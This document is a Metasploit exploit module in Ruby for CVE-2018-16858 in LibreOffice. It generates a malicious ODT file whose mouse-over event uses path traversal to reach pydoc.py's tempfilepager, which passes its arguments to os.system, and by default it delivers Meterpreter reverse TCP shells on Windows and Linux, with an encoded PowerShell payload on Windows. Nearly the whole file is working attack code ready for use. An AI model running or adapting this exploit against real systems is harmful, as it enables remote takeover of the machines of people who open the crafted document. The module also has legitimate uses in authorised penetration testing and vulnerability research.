LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Powershell
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'LibreOffice Macro Code Execution',
      'Description'    => %q{
        LibreOffice comes bundled with sample macros written in Python and
        allows the ability to bind program events to them. A macro can be tied
        to a program event by including the script that contains the macro and
        the function name to be executed. Additionally, a directory traversal
        vulnerability exists in the component that references the Python script
        to be executed. This allows a program event to execute functions from Python
        scripts relative to the path of the samples macros folder. The pydoc.py script
        included with LibreOffice contains the tempfilepager function that passes
        arguments to os.system, allowing RCE.

        This module generates an ODT file with a mouse over event that
        when triggered, will execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
      [
        'Alex Inführ', # Vulnerability discovery and PoC
        'Shelby Pace'  # Metasploit Module
      ],
      'References'     =>
        [
          [ 'CVE', '2018-16858' ],
          [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
        ],
      'Platform'       => [ 'win', 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'        =>
        [
          [
            'Windows',
            {
              'Platform'        =>  'win',
              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
              'Payload'         =>  'windows/meterpreter/reverse_tcp',
              'DefaultOptions'  =>  { 'PrependMigrate'  =>  true }
            }
          ],
          [
            'Linux',
            {
              'Platform'        =>  'linux',
              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
              'Payload'         =>  'linux/x86/meterpreter/reverse_tcp',
              'DefaultOptions'  =>  { 'PrependFork' =>  true },
              'CmdStagerFlavor' =>  'printf',
            }
          ]
        ],
      'DisclosureDate'  =>  "Oct 18, 2018",
      'DefaultTarget'   =>  0
    ))

    register_options(
    [
      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
    ])
  end

  def gen_windows_cmd
    opts =
    {
      :remove_comspec       =>  true,
      :method               =>  'reflection',
      :encode_final_payload =>  true
    }
    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
    @cmd << ' && echo'
  end

  def gen_linux_cmd
    @cmd = generate_cmdstager.first
    @cmd << ' && echo'
  end

  def gen_file(path)
    text_content = Rex::Text.rand_text_alpha(10..15)

    # file from Alex Inführ's PoC post referenced above
    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
    libre_file = ERB.new(fodt_file).result(binding())
    libre_file
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, 'Cannot find template file')
  end

  def exploit
    path = '../../../program/python-core-3.5.5/lib/pydoc.py'
    if datastore['TARGET'] == 0
      gen_windows_cmd
    elsif datastore['TARGET'] == 1
      gen_linux_cmd
    else
      fail_with(Failure::BadConfig, 'A formal target was not chosen.')
    end
    fodt_file = gen_file(path)

    file_create(fodt_file)
  end
end